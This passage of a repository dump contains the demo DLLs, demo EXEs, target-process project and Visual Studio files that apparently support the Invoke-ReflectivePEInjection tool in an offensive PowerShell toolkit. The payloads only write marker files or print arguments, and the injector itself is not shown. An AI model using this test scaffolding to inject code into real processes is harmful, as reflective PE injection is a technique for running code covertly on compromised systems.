24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point. Deliberately does nothing for any attach/detach notification; the
// DLL's work lives entirely in its exported functions. Always reports success.
// NOTE(review): keep it this way — when the image is mapped by Invoke-ReflectivePEInjection
// instead of the OS loader, DllMain is presumably reached via the injector's own call
// (see CallDllMain.asm under the Shellcode resources), so nothing here may depend on
// normal loader-lock behaviour.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    // DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH and DLL_PROCESS_DETACH
    // are all accepted without any action.
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
// Records that the export ran by dropping a marker file: a DLL injected into another
// process has no console of its own to print to. The directory c:\ReflectiveLoaderTest
// is created first.
// NOTE(review): neither the _mkdir result nor the open result is checked, so a failure
// (for example lacking permission to create a directory at the volume root) leaves no
// trace at all — the marker simply does not appear.
extern "C" __declspec( dllexport ) void VoidFunc()
{
    static const char* const markerDir  = "c:\\ReflectiveLoaderTest";
    static const char* const markerFile = "c:\\ReflectiveLoaderTest\\DllVoidFunction.txt";

    _mkdir(markerDir);

    // ofstream's destructor closes the file when the scope ends.
    std::ofstream marker(markerFile);
    marker << "Dll Void function successfully called.\n";
}
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
When created by the wizard, this DLL exported no symbols and therefore
produced no .lib file. This project now exports VoidFunc from
DemoDLL_RemoteProcess.cpp (extern "C" __declspec(dllexport)), so an
import library is produced and the project can be used as a dependency
of another project. If you ever remove that export again, you will either
need to add code to export some symbols from the DLL so that an export
library is produced, or set the Ignore Input Library property to Yes on
the General property page of the Linker folder in the project's Property
Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    // Demo DLL entry point: on process attach, drop a marker file so the
    // PowerShell harness can confirm DllMain was reached. Every other
    // reason code is a no-op, and the attach never fails (always TRUE).
    //
    // NOTE(review): file I/O inside DllMain is a deadlock hazard when the
    // DLL is loaded by the real Windows loader (loader lock held). This demo
    // is presumably entered through the injector's CallDllMain shellcode
    // instead -- confirm before reusing the pattern elsewhere.
    // The fixed, predictable path and the ignored _mkdir/open results mean
    // a failure leaves no trace; acceptable only on a disposable test VM.
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        _mkdir("c:\\ReflectiveLoaderTest");
        std::ofstream marker("c:\\ReflectiveLoaderTest\\DllMain.txt");
        marker << "DllMain successfully called.\n";
        // marker is flushed and closed by its destructor
    }

    return TRUE;
}
28 |
29 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
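int _tmain(int argc, _TCHAR* argv[])
{
    // Demo payload for Invoke-ReflectivePEInjection: echo the argument
    // vector the injector built so the caller can verify argc/argv were
    // passed through correctly. The project is built with
    // CharacterSet=Unicode (see the .vcxproj), so _TCHAR is wchar_t.
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the only conversion defined for a pointer; the former %d was
    // undefined behaviour and on x64 printed only the low 32 bits of argv.
    printf("ArgvAddress: %p\n", (void*)argv);

    // Stay on the narrow printf stream: mixing printf and wprintf on stdout
    // is undefined by the C standard (stream orientation), and %ls is the
    // standard conversion for a wchar_t string in a narrow format string.
    // argv here is constructed by the injector rather than the CRT, so a
    // NULL vector or NULL entry is reported instead of dereferenced.
    for (int i = 0; argv != NULL && i < argc; i++)
    {
        if (argv[i] == NULL)
        {
            printf("Argv: <null>\n");
        }
        else
        {
            printf("Argv: %ls\n", argv[i]);
        }
    }

    printf("Exiting exe\n");

    return 0;
}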
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}
23 | Win32Proj
24 | DemoExe_MD
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 | MultiThreadedDLL
89 |
90 |
91 | Console
92 | true
93 |
94 |
95 |
96 |
97 | Use
98 | Level3
99 | Disabled
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreadedDLL
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | Use
113 | MaxSpeed
114 | true
115 | true
116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
117 | true
118 |
119 |
120 | Console
121 | true
122 | true
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | Use
130 | MaxSpeed
131 | true
132 | true
133 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 | true
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | Create
154 | Create
155 | Create
156 | Create
157 |
158 |
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
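int _tmain(int argc, _TCHAR* argv[])
{
    // Demo payload for Invoke-ReflectivePEInjection (debug-CRT build): echo
    // the argument vector the injector built so the caller can verify
    // argc/argv were passed through correctly. The project is built with
    // CharacterSet=Unicode (see the .vcxproj), so _TCHAR is wchar_t.
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the only conversion defined for a pointer; the former %d was
    // undefined behaviour and on x64 printed only the low 32 bits of argv.
    printf("ArgvAddress: %p\n", (void*)argv);

    // Stay on the narrow printf stream: mixing printf and wprintf on stdout
    // is undefined by the C standard (stream orientation), and %ls is the
    // standard conversion for a wchar_t string in a narrow format string.
    // argv here is constructed by the injector rather than the CRT, so a
    // NULL vector or NULL entry is reported instead of dereferenced.
    for (int i = 0; argv != NULL && i < argc; i++)
    {
        if (argv[i] == NULL)
        {
            printf("Argv: <null>\n");
        }
        else
        {
            printf("Argv: %ls\n", argv[i]);
        }
    }

    printf("Exiting exe\n");

    return 0;
}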
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}
23 | Win32Proj
24 | DemoExe_MDd
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | Create
152 | Create
153 | Create
154 | Create
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
